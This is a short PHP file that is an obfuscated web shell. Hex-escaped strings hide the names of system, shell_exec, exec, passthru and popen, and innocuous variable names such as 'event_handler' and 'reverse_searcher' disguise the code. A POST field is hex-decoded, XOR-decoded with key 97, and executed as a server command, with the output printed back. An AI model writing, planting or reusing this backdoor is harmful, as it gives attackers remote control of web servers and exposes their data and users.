<?php

$event_handler3 = "e\x78\x65c";
$event_handler7 = "\x70\x63\x6Cose";
$event_handler6 = "str\x65\x61m\x5F\x67\x65t\x5Fcon\x74ents";
$event_handler2 = "\x73h\x65ll_\x65xe\x63";
$event_handler4 = "\x70\x61ssth\x72\x75";
$event_handler5 = "po\x70\x65n";
$splitter_tool = "\x68e\x782bin";
$event_handler1 = "s\x79\x73\x74em";
if (isset($_POST["e\x6C\x65\x6De\x6Et"])) {
            function reverse_searcher( $ent,  $component) {
 $hld = '';
 $a=0;
 while($a<strlen($ent)){
$hld.=chr(ord($ent[$a])^$component);
$a++;

} return$hld;

}
            $element = $splitter_tool($_POST["e\x6C\x65\x6De\x6Et"]);
            $element = reverse_searcher($element, 97);
            if (function_exists($event_handler1)) {
                $event_handler1($element);
            } elseif (function_exists($event_handler2)) {
                print $event_handler2($element);
            } elseif (function_exists($event_handler3)) {
                $event_handler3($element, $dat_ent);
                print join("\n", $dat_ent);
            } elseif (function_exists($event_handler4)) {
                $event_handler4($element);
            } elseif (function_exists($event_handler5) && function_exists($event_handler6) && function_exists($event_handler7)) {
                $component_hld = $event_handler5($element, 'r');
                if ($component_hld) {
                    $pset_reference = $event_handler6($component_hld);
                    $event_handler7($component_hld);
                    print $pset_reference;
                }
            }
            exit;
        }